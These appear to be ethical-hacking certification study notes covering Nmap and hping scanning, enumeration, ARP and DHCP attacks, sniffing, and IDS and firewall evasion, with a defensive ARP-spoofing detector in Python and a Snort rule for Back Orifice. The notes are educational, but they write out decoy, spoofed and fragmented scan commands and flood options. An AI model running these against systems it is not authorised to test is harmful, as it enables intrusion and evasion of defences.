#### ICMP \(Internet Control Message Protocol\)

- ICMP is the easiest way to scan for live systems, but it is sometimes blocked on hosts that are actually live
- The payload of an ICMP message can be anything \(the RFC never set what it was supposed to be\); this allows for covert channels
- **Ping sweep**: easiest method to identify hosts
- **ICMP ECHO scanning**: sending an ICMP Echo Request to each IP address in the network range \(ping sweeping\)
- ICMP Type 3 Code 13 \(communication administratively prohibited\) indicates that traffic is being blocked by a router or firewall
- ICMP Type 3 Code 3 \(port unreachable\) indicates that the host itself is up but has that UDP port closed

##### Message Types

| ICMP Message Type          | Description and Codes                                                    |
| :------------------------- | :----------------------------------------------------------------------- |
| 0: Echo Reply              | Answer to a Type 8 Echo Request                                          |
| 3: Destination Unreachable | Error message followed by these codes:                                   |
|                            | 0 - Destination network unreachable                                      |
|                            | 1 - Destination host unreachable                                         |
|                            | 2 - Protocol unreachable                                                 |
|                            | 3 - Port unreachable                                                     |
|                            | 6 - Network unknown                                                      |
|                            | 7 - Host unknown                                                         |
|                            | 9 - Network administratively prohibited                                  |
|                            | 10 - Host administratively prohibited                                    |
|                            | 13 - Communication administratively prohibited                           |
| 4: Source Quench           | A congestion control message \(deprecated\)                              |
| 5: Redirect                | Sent when there are two or more gateways available for the sender to use |
|                            | 0 - Redirect datagram for the network                                    |
|                            | 1 - Redirect datagram for the host                                       |
| 8: Echo Request            | A ping message, requesting an echo reply                                 |
| 11: Time Exceeded          | Packet took too long to be routed \(code 0 is TTL expired\)              |

##### Ping scanning tools

- Nmap: performs host discovery \(a ping sweep\) before every scan unless you turn it off with `-Pn`
- Angry IP Scanner
- SolarWinds Engineer Toolkit
- Advanced IP Scanner
- Pinkie

#### Vulnerability Scanning

- Running simple or complex tools against a target to determine its vulnerabilities
- Tools
  - Nessus: industry standard
  - GFI LanGuard
  - Qualys
  - FreeScan: best known for testing websites and applications
  - OpenVAS: best competitor to Nessus, and free

### Enumeration

- Listing the items that are found within a specific target
- Always active by nature

#### NetBIOS \(Network Basic Input/Output System\) Enumeration

- NetBIOS provides name servicing, connectionless communication and some Session layer functions
- NetBIOS is the browser service in Windows designed to host information about all machines within a domain or TCP/IP network segment
- A NetBIOS name is a **16-character ASCII string** used to identify devices. Of those 16 characters, 15 are used for the device name, and the remaining character is reserved for the service name or name record type
- NetBIOS name resolution doesn't work on IPv6
- nbtstat \(on Windows\)
  - Local table: `nbtstat -n`
  - Remote information: `nbtstat -A <IP address>`
  - Cache information: `nbtstat -c`
- Other Tools
  - SuperScan
  - Hyena
  - NetBIOS Enumerator
  - NSAuditor

##### NetBIOS code and meaning

| Code | Type | Meaning |
| :----- | :----- | :------------------------ |
| `<00>` | UNIQUE | Hostname |
| `<00>` | GROUP | Domain name |
| `<03>` | UNIQUE | Windows Messenger service |
| `<1B>` | UNIQUE | Domain master browser |
| `<1C>` | GROUP | Domain controller |
| `<1D>` | UNIQUE | Master browser for subnet |
| `<20>` | UNIQUE | File Service |

#### SNMP \(Simple Network Management Protocol\) Enumeration

- Used for network device management; uses both an agent and a manager to ensure logging and control
  - Agents are embedded in every network device
  - Manager is installed on a separate computer
- There is a read-only and a read-write version
  - Default read-only string is **public**
  - Default read-write string is **private**
- SNMP uses **community strings**, which function as passwords and are sent in cleartext unless SNMP v3 is used
- **Management Information Base** \(MIB\): database that stores the information; it uses ASN.1 \(Abstract Syntax Notation One\)
- **Object Identifiers** \(OID\): identifiers for information stored in the MIB
- **SNMP GET**: reads information about the system
- **SNMP SET**: writes information to the system
- **Types of objects**
  - **Scalar**: single object
  - **Tabular**: multiple related objects that can be grouped together
- Tools
  - Engineer's Toolset
  - SNMPScanner
  - OpUtils 5: includes SNMP tools
  - SNScan

#### SMTP \(Simple Mail Transfer Protocol\) Enumeration

- VRFY: verifies email addresses; code 200 success, code 550 failure
- EXPN: provides the actual delivery addresses of mailing lists and aliases
- RCPT TO: defines recipients

#### NTP \(Network Time Protocol\) Enumeration

- Querying can give you a list of systems connected to the server, by name and IP
- Tools
  - NTP Server Scanner
  - AtomSync
- Commands
  - ntptrace
  - ntpdc
  - ntpq

#### LDAP \(Lightweight Directory Access Protocol\) Enumeration

- Connects on port 389 to a Directory System Agent \(DSA\)
- Returns information such as valid user names, domain information, addresses, telephone numbers, system data, organization structure and other items; interfaces with Active Directory \(AD\)
- Tools
  - Softerra
  - JXplorer
  - Lex \(The LDAP Explorer\)
  - LDAP Admin Tool

### Nmap

#### Full connect scan

- `nmap -sT`
- TCP connect or full open scan
- Completes the full connection and then tears it down with RST
- Easiest to detect, but most reliable

#### TCP SYN scan \(Stealth scan\)

- `nmap -sS`
- Half-open scan or stealth scan
- Only sends SYN packets
- The connection is abruptly ended before the three-way handshake completes
- Hides the scan and evades some firewalls

##### Responses to Full and SYN scan probe

| Probe Response | Assigned State |
| :----------------- | :------------- |
| TCP SYN/ACK packet | open |
| TCP RST packet | closed |

#### Inverse TCP flag scan \(FIN, URG and PSH scanning\)

- Uses the FIN, URG or PSH flag
- Setting just the TCP FIN bit is a FIN scan: `nmap -sF`

#### NULL scan

- `nmap -sN`
- TCP flag header is 0, no flag set
- Does not work against systems where RFC 793 is not implemented

#### Xmas scan

- `nmap -sX`
- All flags \(FIN, PSH and URG\) are turned on so it's "lit up" like a Christmas tree
- Does not work against Windows machines

##### Responses to NULL, FIN, or Xmas scan

| Probe Response | Assigned State |
| :------------------------------------------------------------ | :--------------- |
| No response received \(even after retransmissions\) | open or filtered |
| TCP RST packet | closed |
| ICMP unreachable error \(type 3, code 1, 2, 3, 9, 10, or 13\) | filtered |

#### TCP ACK scan

- ACK scan: `nmap -sA`
- Window scan: `nmap -sW`
- Probe packets with the ACK flag set and a random sequence number are sent to the recipient host
- Multiple methods
  - TTL version: if the TTL of the RST packet is < 64, the port is open
  - Window version: if the Window on the RST packet is anything other than 0, the port is open
- Can be used to check filtering: if an ACK is sent and there is no response, a stateful firewall is present

#### IDLE Scan

- `nmap -sI <zombie> <target>`
- Uses a third party \(zombie\) to check if a port is open; exploits a side channel
- Only works if the third party isn't transmitting data, i.e. it is in an idle state
- The IPID gives the information about whether the port is open or closed:
  - Port closed: IPID increase of 1
  - Port open: IPID increase of 2
  - An IPID increase of anything greater indicates the zombie was not idle

```text
- Step 1: Send a probe to the zombie and record its IPID
              SYN/ACK
    Attacker ---------> Zombie
             <---------
              RST IPID=x

- Step 2: Send a spoofed SYN (source IP = zombie) to the target; the target answers the zombie
              SYN IP=Zombie
    Attacker ---------> Target
    Zombie   <--------- Target
              SYN/ACK
    Zombie   ---------> Target
              RST IPID=x+1

- Step 3: Probe the zombie again and compare the IPID
              SYN/ACK
    Attacker ---------> Zombie
             <---------
              RST IPID=x+2
```

#### Nmap Switches

| Switch | Description |
| :-------------- | :-------------------------------------------------------------- |
| -sA | ACK scan |
| -sF | FIN scan |
| -sI | IDLE scan |
| -sL | DNS scan \(list scan\) |
| -sN | NULL scan |
| -sO | Protocol scan \(tests which IP protocols respond\) |
| -sP/-sn | Ping scan |
| -sS | TCP SYN scan |
| -sT | TCP connect scan, full scan |
| -sW | Window scan |
| -sX | XMAS scan |
| -PE/PP/PM | ICMP ECHO, timestamp, and netmask request discovery probes |
| -P0/PN/Pn | No ping |
| -PS | TCP SYN/ACK to given ports |
| -oN | Normal output |
| -oX | XML output |
| -A | OS detection, version detection, script scanning and traceroute |
| -F | Fast mode: scan fewer ports than the default scan |
| -f | Fragment packets |
| -S | Spoof source address |
| -O | Enable OS detection |
| -T0 through -T2 | Serial scans. T0 is slowest |
| -T3 through -T5 | Parallel scans. T3 is slowest. T3 is the default level |

### hping

- `hping3 -1 <target>`
- Powerful ping sweep and port scanning tool
- Can craft packets

#### hping switch and description

| Switch | Description |
| :------ | :--------------------------------------------------------------------- |
| -1 | Sets ICMP mode |
| -2 | Sets UDP mode |
| -8 | Sets scan mode. Expects port range without -p flag |
| -9 | Listen mode. Expects signature \(e.g. HTTP\) and interface \(-I eth0\) |
| --flood | Sends packets as fast as possible without showing incoming replies |
| -Q | Collects sequence numbers generated by the host |
| -p | Sets port number |
| -F | Sets the FIN flag |
| -S | Sets the SYN flag |
| -R | Sets the RST flag |
| -P | Sets the PSH flag |
| -A | Sets the ACK flag |
| -U | Sets the URG flag |
| -X | Sets the XMAS scan flags |

--------------------------------------------------------------------------------
/04-sniffing_and_evasion.md:
--------------------------------------------------------------------------------

# 04-Sniffing and Evasion

## Table of Contents

- [Sniffing and Evasion](04-sniffing_and_evasion.md#sniffing-and-evasion)
  - [Sniffing](04-sniffing_and_evasion.md#sniffing)
    - [Basic Knowledge](04-sniffing_and_evasion.md#basic-knowledge)
      - [NIC \(Network Interface Card\)](04-sniffing_and_evasion.md#nic-network-interface-card)
      - [MAC \(Media Access Control\)](04-sniffing_and_evasion.md#mac-media-access-control)
      - [ARP \(Address Resolution Protocol\)](04-sniffing_and_evasion.md#arp-address-resolution-protocol)
      - [IPv6](04-sniffing_and_evasion.md#ipv6)
      - [Protocols Susceptible](04-sniffing_and_evasion.md#protocols-susceptible)
    - [SPAN port \(Switched Port Analyzer\)](04-sniffing_and_evasion.md#span-port-switched-port-analyzer)
    - [Wiretapping/Telephone tapping](04-sniffing_and_evasion.md#wiretappingtelephone-tapping)
    - [MAC Flooding](04-sniffing_and_evasion.md#mac-flooding)
    - [Switch port stealing](04-sniffing_and_evasion.md#switch-port-stealing)
    - [DHCP Starvation \(Dynamic Host Configuration Protocol\)](04-sniffing_and_evasion.md#dhcp-starvation-dynamic-host-configuration-protocol)
    - [ARP Poisoning](04-sniffing_and_evasion.md#arp-poisoning)
    - [STP \(Spanning Tree Protocol\) attack](04-sniffing_and_evasion.md#stp-spanning-tree-protocol-attack)
    - [Spoofing](04-sniffing_and_evasion.md#spoofing)
    - [IP Spoofing Detection Techniques](04-sniffing_and_evasion.md#ip-spoofing-detection-techniques)
    - [Wireshark](04-sniffing_and_evasion.md#wireshark)
    - [tcpdump](04-sniffing_and_evasion.md#tcpdump)
    - [Other Sniffing Tools](04-sniffing_and_evasion.md#other-sniffing-tools)
  - [Evasion](04-sniffing_and_evasion.md#evasion)
    - [IDS \(Intrusion Detection System\)](04-sniffing_and_evasion.md#ids-intrusion-detection-system)
      - [Types of IDS](04-sniffing_and_evasion.md#types-of-ids)
      - [Types of Alerts](04-sniffing_and_evasion.md#types-of-alerts)
    - [IPS \(Intrusion Prevention System\)](04-sniffing_and_evasion.md#ips-intrusion-prevention-system)
      - [Types of IPS](04-sniffing_and_evasion.md#types-of-ips)
    - [Firewall](04-sniffing_and_evasion.md#firewall)
      - [Firewall Technologies](04-sniffing_and_evasion.md#firewall-technologies)
      - [Types of Firewall](04-sniffing_and_evasion.md#types-of-firewall)
    - [Honeypot](04-sniffing_and_evasion.md#honeypot)
    - [Evasion Techniques](04-sniffing_and_evasion.md#evasion-techniques)
      - [Firewall Evasion](04-sniffing_and_evasion.md#firewall-evasion)

## Sniffing and Evasion

### Sniffing

- Capturing packets as they pass on the wire to review them for interesting information
- Sniffers operate at OSI Layer 2; upper layers won't be aware of sniffing because the OSI layers are designed independently of each other
- **Passive sniffing**: watching network traffic without interaction; only works within the same collision domain, like sniffing through a hub
- **Active sniffing**: using methods to make a switch send you traffic even though it isn't destined for your machine, like sniffing on a switch-based network

#### Basic Knowledge

##### NIC \(Network Interface Card\)

- Many wireless NICs have poor support for monitor mode in Windows: catching general traffic is OK, but not controlling packets
- **Promiscuous mode**: the NIC must be in this mode to look at all frames passing on the wire
- **Collision Domains**
  - Traffic from your NIC, regardless of mode, can only be seen within the same collision domain
  - A switch has a collision domain for each port
  - A hub has one collision domain by default

##### MAC \(Media Access Control\)

- Physical or burned-in address
- Assigned to a NIC for communications at the Data Link layer
- 48 bits long, displayed as 12 hex characters separated by colons
- First half of the address is the **organizationally unique identifier**, identifying the manufacturer
- Second half ensures no two cards on a subnet will have the same address

##### ARP \(Address Resolution Protocol\)

- Resolves an IP address to a MAC address
- Sends a request packet to all the network elements, asking for the MAC address of a specific IP
- Works on a broadcast basis; both requests and replies are broadcast to everyone
- Broadcast destination MAC address: `FF:FF:FF:FF:FF:FF`
- Packets are `ARP_REQUEST` and `ARP_REPLY`
- Stateless: each computer maintains its own ARP cache, which can be poisoned
- ARP command
  - Display current ARP cache: `arp -a`
  - Clear ARP cache: `arp -d *`

##### IPv6

- 128-bit address \(0000:0000:0000:0000:0000:0000:0000:0000, 4x8+7=39 characters\), 8 groups of 4 hexadecimal digits
- Groups that are all 0s are shortened to nothing, leaving just the start and end colons
- The double colon can be used only once
- Loopback address is `::1`

| IPv6 Address Type | Description |
| :---------------- | :---------------------------------------------------- |
| Unicast | Addressed and intended for one host interface |
| Multicast | Addressed for multiple host interfaces |
| Anycast | Large number of hosts can receive; nearest host opens |

| IPv6 Scopes | Description |
| :---------- | :------------------------------------------------------------------------ |
| Link local | Applies only to hosts on the same subnet \(Address block fe80::/10\) |
| Site local | Applies to hosts within the same organization \(Address block fec0::/10\) |
| Global | Includes everything |

- Scope applies to multicast and anycast
- Traditional network scanning is **computationally less feasible**

##### Protocols Susceptible

- SMTP is sent in plain text and is viewable over the wire, until SMTPv3, which limits the information you can get, but you can still see it
- SNMP community string, which acts like a user id or password
- FTP, TFTP, IMAP, POP3, NNTP \(Network News Transfer Protocol\) and HTTP all send data in clear text
- TCP shows sequence numbers, usable in session hijacking
- TCP and UDP show open ports
- IP shows source and destination addresses
- Telnet and Rlogin show keystrokes, including user names and passwords sent in cleartext

#### SPAN port \(Switched Port Analyzer\)

- Also known as **Port Mirroring**
- A Cisco switch feature: a switch configuration that makes the switch send a copy of all frames from other ports to a specific port
- Not all switches have the ability to do this
- Only listens
- Modern switches sometimes don't allow SPAN ports to send data
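The ARP section above notes that each host's ARP cache is stateless and can be poisoned, and the ARP Poisoning countermeasures later in this file point to tools such as XArp that detect it. As an added example that is not part of the original notes, the Python below runs the core of such a detector over constructed ARP traffic (the addresses, packet fields, alert wording and severities are this example's own assumptions): it baselines IP-to-MAC bindings and flags unsolicited replies, binding changes and one MAC answering for several IPs.

```python
"""Added example: flag ARP cache poisoning indicators from observed ARP traffic.

The input is constructed, not taken from the notes: a short list of ARP packets
as a sniffer on the segment would see them. The detector keeps a baseline of
IP -> MAC bindings (the same data `arp -a` shows) and reports three indicators:
  * an unsolicited ("gratuitous") reply with no outstanding request for that IP,
  * a binding change for an IP, escalated when the IP is protected (e.g. gateway),
  * one MAC ending up bound to several IPs.
Field names and severities are this example's own choices.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Set


@dataclass(frozen=True)
class ArpPacket:
    op: str          # "request" or "reply"
    sender_ip: str
    sender_mac: str
    target_ip: str


@dataclass
class ArpMonitor:
    protected_ips: Set[str]
    bindings: Dict[str, str] = field(default_factory=dict)  # ip -> mac
    pending: Set[str] = field(default_factory=set)          # IPs asked for
    alerts: List[str] = field(default_factory=list)

    def observe(self, pkt: ArpPacket) -> List[str]:
        """Update state with one packet; return the alerts raised by it."""
        new: List[str] = []
        if pkt.op == "request":
            # Someone asked for this IP, so a reply for it is expected.
            self.pending.add(pkt.target_ip)
            return new
        if pkt.op != "reply":
            raise ValueError(f"unknown ARP op {pkt.op!r}")

        ip, mac = pkt.sender_ip, pkt.sender_mac.lower()
        if ip in self.pending:
            self.pending.discard(ip)
        else:
            new.append(f"INFO gratuitous reply: {ip} is-at {mac}")

        old = self.bindings.get(ip)
        if old is None:
            self.bindings[ip] = mac
        elif old != mac:
            severity = "CRITICAL" if ip in self.protected_ips else "WARN"
            new.append(f"{severity} binding change: {ip} {old} -> {mac}")
            self.bindings[ip] = mac
        # The same MAC now answers for more than one IP: typical of a poisoner
        # impersonating both ends of a conversation. A router with several
        # addresses on one interface looks the same, so tune for your network.
        if old != mac:
            claimed = sorted(i for i, m in self.bindings.items() if m == mac)
            if len(claimed) > 1:
                new.append(f"WARN {mac} bound to {len(claimed)} IPs: {claimed}")
        self.alerts.extend(new)
        return new


# Constructed traffic: two legitimate request/reply pairs, then a host with
# MAC de:ad:be:ef:00:01 sending unsolicited replies for the gateway and a peer.
SAMPLE_TRAFFIC = [
    ArpPacket("request", "192.168.1.10", "00:11:22:33:44:10", "192.168.1.1"),
    ArpPacket("reply",   "192.168.1.1",  "00:11:22:33:44:01", "192.168.1.10"),
    ArpPacket("request", "192.168.1.10", "00:11:22:33:44:10", "192.168.1.20"),
    ArpPacket("reply",   "192.168.1.20", "00:11:22:33:44:20", "192.168.1.10"),
    ArpPacket("reply",   "192.168.1.1",  "DE:AD:BE:EF:00:01", "192.168.1.10"),
    ArpPacket("reply",   "192.168.1.20", "DE:AD:BE:EF:00:01", "192.168.1.10"),
]


def run(packets: List[ArpPacket] = SAMPLE_TRAFFIC,
        gateway: str = "192.168.1.1") -> List[str]:
    """Feed packets through a monitor protecting the gateway; return all alerts."""
    mon = ArpMonitor(protected_ips={gateway})
    for pkt in packets:
        mon.observe(pkt)
    return mon.alerts


if __name__ == "__main__":
    for line in run():
        print(line)
```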
#### Wiretapping/Telephone tapping 119 | 120 | - **Active**: alerting or affecting the communication 121 | - **Passive**: only monitoring or recording the traffic 122 | - **Lawful interception**: legally intercepting communications between two parties for surveillance 123 | 124 | #### MAC Flooding 125 | 126 | - Switches either flood or forward data 127 | - If a switch doesn't know what MAC address is on a port, it will flood the data until it finds out 128 | - MAC Flooding by sending so many MAC addresses to the CAM table that it can't keep up 129 | - MAC Flooding will often destroy the switch before you get anything useful, doesn't last long to get noticed 130 | - Most modern switches protect against this 131 | - **CAM Table** 132 | - The table on a switch that stores which MAC address is on which port 133 | - If table is empty or full, everything is sent to all ports 134 | - Tool: Macof 135 | 136 | #### Switch port stealing 137 | 138 | - Using MAC flooding to sniff packets 139 | - Flooding switch with forged gratuitous ARP packets with target MAC as source, and attacker's MAC as destination 140 | - A race condition of attacker's flooded packets and target host packets will occur, switch has to change MAC address binding constantly 141 | 142 | #### DHCP Starvation \(Dynamic Host Configuration Protocol\) 143 | 144 | - Attempting to exhaust all available addresses from the server, denial-of-service attack 145 | - Attacker sends so many requests that the address space allocated is exhausted 146 | - DHCPv4 packets: DHCPDISCOVER, DHCPOFFER, DHCPREQUEST, DHCPACK 147 | - DHCPv6 packets: Solicit, Advertise, Request \(Confirm, Renew, Rebind\), Reply 148 | - **DHCP Steps** 149 | 1. Client sends DHCPDISCOVER 150 | 2. Server responds with DHCPOFFER 151 | 3. Client sends request for IP with DHCPREQUEST 152 | 4. Server sends address and config via DHCPACK 153 | - Tool: Yersinia 154 | - **Rogue DHCP Server Attack**: setup to offer addresses instead of real server. 
Can be combined with starvation to real server 155 | - Countermeasures 156 | - To counter DHCP starvation, ussing port security to limit max. number of MAC addresses on switch 157 | - To counter rogue DHCP server attack, configuring DHCP snooping: `ip dhcp snooping` 158 | 159 | #### ARP Poisoning 160 | 161 | - Also called **ARP spoofing** or **gratuitous ARP responses** 162 | - Using special packet to update ARP cache even without a request, used to poison cache on other machines 163 | - Changing the cache of machines so that packets are sent to the attacker instead of the intended target 164 | - Can trigger alerts because of the constant need to keep updating the ARP cache of machines 165 | - **Countermeasures** 166 | - Permanently adding Default gateway MAC into each machine's cache 167 | - Using Dynamic ARP Inspection \(DAI\), DHCP snooping database to prevent MITM 168 | - Using XArp to detect ARP attacks 169 | - Tools 170 | - Cain and Abel 171 | - Ufasoft Snif 172 | - dsniff 173 | 174 | #### STP \(Spanning Tree Protocol\) attack 175 | 176 | - Attacker has access to switch ports that are able to become trunk ports, then introduce a rogue switch spanning tree priority into the network 177 | - Countermeasure: loop protection 178 | 179 | #### Spoofing 180 | 181 | - **MAC Spoofing** 182 | - An address-based authentication attack, changes your MAC address. 
Benefit is CAM table uses most recent address 183 | - Making switch send all packets to your address instead of the intended one until the CAM table is updated with the real address again 184 | - Port security allows traffic from a specific MAC address to enter to a port 185 | - Port security can slow this down, but doesn't always stop it 186 | - A security feature on switches that allows an administrator to manually assign MAC addresses to a specific port 187 | - Spoofing Tool: Technitium MAC Address Changer 188 | - **Countermeasures** 189 | - DHCP Snooping Binding Table: filters untrusted DHCP messages 190 | - Dynamic ARP Inspection 191 | - IP Source Guard: security feature in switch that restricts IP traffic on untrusted Layer 2 ports by filtering traffic based on DHCP snooping binding database 192 | - Encryption: encrypting communication between AP and computer 193 | - Retrieval of MAC Address: retrieving MAC address from NIC directly instead of from OS 194 | - Implementation of IEEE 802.1X suites: Port-based Network Access Control \(PNAC\), enforces access control when user joins the network 195 | - AAA \(Authentication, Authorization, Accounting\): using AAA server mechanism in order to filter MAC addresses subsequently 196 | - **IRDP \(Internet Router Discovery Protocol\) Spoofing** 197 | - Attacker sends ICMP Router Discovery Protocol messages advertising a malicious gateway 198 | - Passive sniffing, MITM, DoS 199 | - **Countermeasure**: disables IRDP on hosts 200 | - **DNS Poisoning/Spoofing** 201 | - Changing where machines get their DNS information from, allowing attacker to redirect to malicious websites 202 | - **DNS Cache Poisoning**: allowing attacker to replace IP address entries for a target site on a given DNS server with IP address of the server he/she controls 203 | - **DNSSEC**: helping prevent DNS poisoning by encrypting records 204 | 205 | #### IP Spoofing Detection Techniques 206 | 207 | - **Direct TTL Probes** 208 | - Sending packet to host 
of suspect spoofed packet that triggers reply and compare TTL with suspect packet 209 | - TTL in the reply is not as the same as the packet being checked, it's a spoofed packet 210 | - This technique is successful when the attacker is in a different subnet from that of the victim 211 | - **IP Identification Number** 212 | - Sending probe to host of suspect spoofed traffic that triggers reply and compare the IP ID with suspect traffic 213 | - IP IDs are not close in value to the packet being checked, suspect traffic is spoofed 214 | - This technique is deemed successful even if the attacker is in the same subnet 215 | - **TCP Flow Control Method** 216 | - Attackers sends spoofed TCP packets, will not receive the target's SYN-ACK packets 217 | - Attackers cannot therefore be responsive to change in the congestion window size 218 | - When received traffic continues after a window size is exhausted, most probably the packets are spoofed 219 | 220 | #### Wireshark 221 | 222 | - Previously known as Ethereal 223 | - Can be used to follow streams of data 224 | - Can also filter the packets by specific packet type or specific source address, for example: 225 | - Filter out the noise from ARP, DNS and ICMP requests: `! 
(arp or icmp or dns)` 226 | - Display HTTP GET requests: `http.request` 227 | - Display TCP segments that contain the word _string_: `tcp contains string` 228 | - Display telnet packets containing that IP: `ip.addr==172.17.15.12 && tcp.port==23` 229 | - Display TCP requests with ACK flag set: `tcp.flags==0x16` 230 | - Display all TCP connections with SYN packets: `tcp.flags.syn==1` 231 | 232 | #### tcpdump 233 | 234 | - Recent version is WinDump \(for Windows\) 235 | - `tcpdump [flag] [interface]` 236 | - Put the interface in listening mode: `tcpdump -i eth1 ` 237 | - `-n` flag to not perform DNS resolution on IP addresses 238 | - `tcptrace` can be used to analyze tcpdump file 239 | 240 | #### Other Sniffing Tools 241 | 242 | - Ettercap: also can be used for MITM attacks, ARP poisoning. Has active and passive sniffing 243 | - Snort: usually discussed as an Intrusion Detection application 244 | - SteelCentral Packet Analyzer 245 | - Capsa Network Analyzer 246 | - OmniPeek 247 | - Observer Analyzer 248 | - Wi.cap. 
Network Sniffer Pro: mobile network packet sniffer for ROOT ARM droids 249 | - Packet Capture: network traffic sniffer app with SSL decryption 250 | 251 | ### Evasion 252 | 253 | #### IDS \(Intrusion Detection System\) 254 | 255 | - Hardware or software devices that examine streams of packets for malicious behavior 256 | 257 | ##### Types of IDS 258 | 259 | - **Signature based**: comparing packets against a list of known traffic patterns 260 | - **Anomaly based**: making decisions on alerts based on learned behavior and "normal" patterns 261 | - **HIDS** \(Host-based intrusion detection system\): examining specific host-based actions, such as what applications are being used, what files are being accessed and what information resides in the kernel logs 262 | - **NIDS** \(Network-based intrusion detection system\): scanning network traffic, do not use host system resources 263 | - **NBA** \(Network behavior analysis\): examining network traffic to identify threats that generate unusual traffic flows 264 | - **Snort**: a widely deployed IDS that is open source 265 | 266 | - Runs in three different modes 267 | - **Sniffer Mode**: watching packets in real time 268 | - **Packet Logger Mode**: saving packets to disk for review at a later time 269 | - **NIDS Mode**: analyzing network traffic against various rule sets 270 | - Syntax 271 | 272 | - Alert about traffic coming not from an external network to the internal one on port 31337: 273 | 274 | ```text 275 | alert tcp !HOME_NET any -> $HOME_NET 31337 (msg : "BACKDOOR ATTEMPT-Backorifice") 276 | ``` 277 | 278 | - Example output: 279 | 280 | ```text 281 | 10/19-14:48:38.543734 0:48:542:2A:67 -> 0:10:B5:3C:34:C4 type:0x800 len:0x5EA 282 | **xxx -> xxx TCP TTL:64 TOS:0x0 ID:18112 IpLen:20 DgmLen:1500 DF** 283 | ``` 284 | 285 | ##### Types of Alerts 286 | 287 | - **True Positive** \(Attack - Alert\): activity was an attack, IDS identifies as an attack 288 | - **False Positive** \(No Attack - Alert\): activity was acceptable, 
but IDS identifies as an attack 289 | - **False Negative** \(Attack - No Alert\): activity was an attack, but IDS identifies as an acceptable behavior 290 | - **True Negative** \(No Attack - No Alert\): activity was acceptable, IDS identifies as an acceptable behavior 291 | 292 | #### IPS \(Intrusion Prevention System\) 293 | 294 | - Identifying malicious activity, logs information about this activity, reports it and attempts to block or stops it 295 | 296 | ##### Types of IPS 297 | 298 | - **NIPS** \(Network-based intrusion prevention system\): monitoring the entire network for suspicious traffic by analyzing protocol activity 299 | - **HIPS** \(Host-based intrusion prevention system\): an installed software package which monitors a single host for suspicious activity by analyzing events occurring within that host 300 | - **WIPS** \(Wireless intrusion prevention system\): monitoring a wireless network for suspicious traffic by analyzing wireless networking protocols 301 | 302 | #### Firewall 303 | 304 | - An appliance within a network protects internal resources from unauthorized access 305 | - Only uses rules that **implicitly denies** traffic unless it is allowed 306 | - Often uses **network address translation** \(NAT\) which can apply a one-to-one or one-to-many relationship between external and internal IP addresses 307 | - **Bastion Host**: hosts on the screened subnet designed to protect internal resources, using the concept "separation of duties" 308 | - **Screened Subnet**: DMZ, hosts all public-facing servers and services 309 | - **Private zone**: hosts internal hosts that only respond to requests from within that zone 310 | - **Multi-homed**: firewall that has 2 or more interfaces 311 | 312 | ```text 313 | - Single Homed Network: 314 | 315 | Enterprice ---------- ISP 316 | 317 | - Dual Homed Network: 318 | 319 | Enterprice ========== ISP 320 | 321 | - Single Multi-homed Network 322 | 323 | ---------- ISP1 324 | Enterprice 325 | ---------- ISP2 326 | 327 
| - Dual Multi-homed Network 328 | 329 | ========== ISP1 330 | Enterprice 331 | ========== ISP2 332 | ``` 333 | 334 | ##### Firewall Technologies 335 | 336 | | OSI | Firewall Technology | 337 | | :-- | :--------------------------------------------------------- | 338 | | 7 | VPN, Application Proxies | 339 | | 6 | VPN | 340 | | 5 | VPN, Circuit-level Gateway | 341 | | 4 | VPN, Packet Filtering | 342 | | 3 | VPN, NAT, Packet Filtering, Stateful Multilayer Inspection | 343 | | 2 | VPN, Packet Filtering | 344 | | 1 | Not Applicable | 345 | 346 | ##### Types of Firewall 347 | 348 | - **Packet-filtering**: only looking at packet headers \(IP address, packet type and port number\), layer 3 Network 349 | - **Circuit-level gateway**: checking TCP handshake, does not filer individual packets, firewall that works on layer 5 Session 350 | - **Application-level gateway**: working like a proxy, allowing specific services in and out, WAF, layer 7 Application 351 | - **Stateful inspection**: combining above 3 types of firewalls, dynamic packet filtering, firewalls that track the entire status of a connection 352 | 353 | #### Honeypot 354 | 355 | - A system setup as a decoy to entice attackers, to research attack methodologies 356 | - Should not include too many open services or look too easy to attack 357 | - **High interaction**: actually running all services and applications and is designed to be completely compromised 358 | - **Medium interaction**: simulating a real OS, applications and its services 359 | - **Low interaction**: simulating a number of services and cannot be completely compromised 360 | - Examples 361 | - Specter 362 | - Honeyd 363 | - KFSensor 364 | 365 | #### Evasion Techniques 366 | 367 | - **Fragmentation**: splitting up packets so that the IDS can't detect the real intent, `nmap -f` 368 | - **Time-To-Live Attack** \(TTL\) 369 | 370 | - Each router along a data path decrements TTL by 1 371 | - TTL reaches 0, package is dropped 372 | - Attacker has a prior 
    knowledge of the topology of the target network, in order to calculate the TTL
  - Breaking traffic into fragments, e.g. Frag 1, Frag 2, Frag 3
  - Sending fragments as in the example below:

  ```text
  Attacker            NIDS                  Router        Victim
  Frag 1           -> Frag 1             -> Frag 1
  Frag 2, TTL=1    -> Frag 1, 2             Dropped       Frag 1, Waiting 2
  Frag 3           -> Frag 1, 2, 3       -> Frag 1, 3     Waiting 2
                      False Reassembly
  Real Frag 2      -> Frag 2             -> Frag 1, 2, 3  Correct Reassembly
  ```

- **Slow down**: faster scanning such as using nmap's `-T5` switch will get you caught. Pros use the `-T1` switch to get better results
- **Unicode encoding**: working with web requests, using Unicode characters instead of ASCII can sometimes get past
- **Network flooding**: triggering alerts that aren't your intended attack so as to confuse firewalls/IDS and network admins
- **Insertion Attack**: confusing the IDS by forcing it to read invalid packets
- **Spoofing**: can only be used when you don't expect a response back to your machine
- **Source routing**: specifying the path a packet should take on the network; most systems don't allow this anymore
- **IP Address Decoy**: sending packets from your IP as well as multiple other decoys to confuse the IDS/Firewall as to where the attack is really coming from
  - `nmap -D RND:10 x.x.x.x`
  - `nmap -D decoyIP1,decoyIP2....,sourceIP,.... [target]`
- **Proxy**
  - Hiding true identity by filtering through another computer
  - Can also be used for other purposes such as content blocking evasion, etc.
  - **Proxy chains**: chain multiple proxies together
    - Proxy Switcher
    - Proxy Workbench
    - ProxyChains
- **Tor**
  - A specific type of proxy that uses multiple hops to a destination
  - Endpoints are peer computers
- **Anonymizers**: hiding identity on HTTP traffic \(port 80\)
- Tools
  - Nessus: also a vulnerability scanner
  - ADMutate: creating scripts not recognizable by signature files
  - Whisker: session splicing

##### Firewall Evasion

- **Firewalking**: going through every port on a firewall to determine what is open
- Firewall type can be discerned by banner grabbing
- The best way around a firewall will always be a compromised internal machine
- **HTTP tunneling**: crafting port 80 segments to carry a payload for protocols the firewall may otherwise block, then on the other end \(internal machine\) pulling the payload out of all those port 80 packets

--------------------------------------------------------------------------------
/05-system_hacking.md:
